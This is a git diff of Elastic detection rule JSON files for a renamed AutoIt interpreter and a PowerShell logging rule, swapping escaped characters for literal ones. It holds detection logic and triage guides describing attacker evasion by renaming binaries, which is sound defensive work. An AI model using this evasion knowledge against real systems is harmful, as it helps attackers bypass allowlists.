domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM 
dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json
index d7b592a80aa..79714cfd838 100644
--- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM 
dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json index 9615d43077a..abdebe69dfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM 
dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json index d9c0c3ce599..9696ff6a2be 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json index 4a9c13ee11d..7990d042625 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json index 4aa2642826c..745408c94b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json index 135e3dd4144..ccea9024e4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json index 8c8a4e2762d..980f69e3d1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE 